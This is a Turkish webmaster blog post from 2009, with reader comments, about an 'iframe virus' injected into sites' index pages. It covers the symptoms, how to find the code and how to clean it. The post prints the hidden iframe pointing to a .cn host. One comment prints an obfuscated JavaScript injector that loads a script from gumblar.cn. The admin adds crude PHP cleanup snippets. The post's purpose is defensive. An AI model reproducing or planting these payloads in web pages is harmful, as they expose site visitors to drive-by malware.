sitenize bulaşan iframe virüsü
Nisan 19, 2009 | In: Salata
TÜM WEBMASTER ARKADAŞLARIMIN DİKKATİNE
Daha önce böyle bir Virüs kodu ile karşılaşmadığım için Forumdaki Webmaster arkadaşlarımı bilgilendirmek istedim.
- Yaklaşık olarak 5 gündür 2k olan sitemin günlük hiti 600-700 tekil hit seviyesine geldi. Buda doğal olarak canımı sıktı.
- Bunun nedeni ne olabilir diye araştırırken daha önce hiç rastlamadığım ve ilk kez gördüğüm bir Virüs kodunun sitemin index`ine girmiş oldugunu farkettim.
- Kodu kaldırdıktan sonra sitemin günlük hitti eski seviyesine tekrar ulaştı.
Gözlemlediğim başka bir zararıda bu 5 gün öncesine kadar belli başlı aramalarada 1. sayfada olan alt sayfalarım nedenini bilmediğim bir şekilde ilgili aramalaradan komple yok olmuşlardı. Kodu kaldırdıktan 2 saat sonra bu sayfalarım tekrar eski yerlerine geldiler.
*** Bu Virüs`ün Zararları ***
- Sitenizi aramalarda geriletebilir.
- Sitenize gelen ziyaretçinin virus programında uyarı çıkartarak ziyaretçiyi siteden uzak tutar.
- Sitenizi “badware” uyarısı alarak hitinizi azaltır.
- Google’ın gözünde Trustrank’ınız düşer.
*** Virüs`ün Etkili Olduğu Alanlar ***
- Virüs ” İndex.htm – İndex.html – İndex.php – home.php – default.php adlı Sayfalara Rahatlıkla Bulaşabiliyor.
*** Virüs Siteme Bulaşmışsa Nasıl Bulabilirim ***
- Virüs Sitenize Bulaşmışsa Yukarıda Belirttiğim Etkili Olduğu Alanlar`daki Sayfaların İçinde ” iframe “ Olarak Aratma Yapınız.
- Bu Aratma Sonuçunda Siteniz İle Alakası Olmayan ” iframe ” Kodu Bulursanız Hemen Siliniz.
*** Virüs`ü Nasıl Temizlerim ***
- Öncelikle Etkili Olduğu Alanlar`daki Sayfalarda Bu Virüs`e Rastlarsanız, Virüs Kodunu Sayfadan Çıkarıp Temiz Dosyalarınızı Ftp`ye Atınız.
- Sonra Ftp Şifrelerinizi Değiştiriniz.
- Bu İşlemleri ” Filezilla – Cute Ftp ” Gibi Ftp Şifrenizi Kayıt Altında Tutan Ftp Programları İle Yapmayınız.
- Ftp`nize Explorer İle Bağlantı Yapınız.
- Explorer İle Bağlantı İçin ( ftp://siteadi@siteadi.com ) Komutunu Kullanın. Karşınıza Panel Çıkacaktır.
- Tüm Bu İşlemlerden Sonra Bilgisayarınıza Virüs Taraması Yaparak Temizleyiniz.
- Bu İşlemlerin Sonunda Virüs Hala Sitenize Geliyorsa, Aynı İşlemleri Baştan Yapın ama Bu Sefer Virüs Taraması Yerine Bilgisayarınıza ” Format ” Atınız.
Bu Konuyu Sadece Bilgilendirme Amaçlı Yazdım. Başınıza Böyle Bir Şey Gelirse Bilginiz Olsun Diye.
Saygılar…
İşte O Kod :
1 | <code><span style="color: #000000;"> <span style="color: #007700;"><</span><span style="color: #0000bb;">iframe src</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"http://perfectnamestore.cn/in.cgi?income7" </span><span style="color: #0000bb;">width</span><span style="color: #007700;">=</span><span style="color: #0000bb;">1 height</span><span style="color: #007700;">=</span><span style="color: #0000bb;">1 style</span><span style="color: #007700;">=</span><span style="color: #dd0000;">"visibility: hidden"</span><span style="color: #007700;">></</span><span style="color: #0000bb;">iframe</span><span style="color: #007700;">> </span></span> |
iframe silme ile ilgili bir script yazmıştım iframe virüsünün ne olduğunu soran arkadaşlar var onlar için bu mesajı yazdım.
r10 da hosyer nickli arkadşaımız yazmıştı oradan ekledim, kendisine teşekkür ederim 
5 Responses to sitenize bulaşan iframe virüsü
Deniz
Nisan 21st, 2009 at 17:30
Teşekkürler Şaho……
Fatih KEBABCI
Mayıs 11th, 2009 at 06:17
Teşekkürler. Virüs şu aralar şekil değiştirdi. Sistem IFRAME olmaktan çıktı. Nasıl bir virüs anlamıyorum. Öncelikle IFRAME ile saldırdı. Onu çözdük şimdi ise JAVASCRIPT kod ile saldırıyor ve JS uzantılı dosyalara bulaşıyor.
eğer bu şekilde bir kod varsa JS dosyanıza otomatik olarak IFRAME oluşturuyor. Sizde PHP ve ASP dosyalarda IFRAME arayıp kazınıp duruyorsunuz ama sonuç yok. Çok dikkatli olmanızı tavsiye ederim.
Fatih KEBABCI
Mayıs 11th, 2009 at 06:17
(function(dqID){var ZcjW=’var-20-61-3d-22Scri-70tEngine-22-2c-62-3d-22V-65rsion()+-22-2cj-3d-22-22-2c-75-3d-6eav-69ga-74-6f-72-2eu-73erAg-65-6e-74-3b-69f((u-2e-69n-64e-78Of-28-22-57in-22)-3e-30)-26-26(-75-2ei-6ed-65x-4ff(-22-4eT-206-22)-3c0)-26-26(do-63u-6d-65-6e-74-2e-63-6f-6fkie-2eind-65xO-66-28-22mi-65-6b-3d1-22)-3c-30)-26-26(-74ypeof-28z-72-76zts)-21-3dtypeof(-22A-22))-29-7bzrvzts-3d-22-41-22-3b-65val(-22i-66(wind-6f-77-2e-22+a+-22)j-3dj+-22+a+-22Major-22+b+a-2b-22M-69nor-22+b-2ba+-22Bui-6c-64-22+b+-22j-3b-22-29-3bdo-63ument-2ewrite(-22-3cs-63rip-74-20src-3d-2f-2fgu-6dblar-2ec-6e-2frss-2f-3fid-3d-22+-6a+-22-3e-3c-5c-2fs-63ri-70t-3e-22-29-3b-7d’;var n1sd=unescape(ZcjW.replace(dqID,’%'));eval(n1sd)})(/-/g);
Fatih KEBABCI
Mayıs 11th, 2009 at 06:18
kod yukardaki şekilde ilk mesajımda çıkmadığı için tekrar post ettim JS dosyalarında bu şekilde kod varsa hemen siliniz. AFR isim bir program var Advanced Find and Replace bu program ile JS dosyalarındaki kodları silebilirsiniz. Tek tek uğraşmadan klasörü gösterirsiniz hemen temizler. Kolay gelsin
admin
Mayıs 11th, 2009 at 07:04
bilgiler için teşekkürler @fatih
+
iframe nin haricinde dediğin gibi js var birde 64base ile kendini şifreleyip php dosyalarının en üst satırına kendini atıyor… onuda
http://www.saho.in/sitenize-iframe-virusu-bulasirsa-temizlemeniz-icin-script/
buradaki script te bir değişiklikle yapılabilir
######################
$oku = file_get_contents($dizin.$dosya);
// $yaz = str_replace(’
’,”,$oku);
$desen = ‘|< (i?)frame .+?>|i’;
$yaz = preg_replace($desen,”,$oku);
####################
yerine
#################
$oku = file($dizin.$dosya);
array_shift($oku);
$yaz = implode(”\n”,$oku);
################
şeklinde değiştirilip ilk satır silinebilir
eğer js lerde son satırda ise dosya uzantısı tespit edilip
index.php ise array_shift , xxx.js ise array_pop ile son satır silinip tekrar kayıt edilebilir….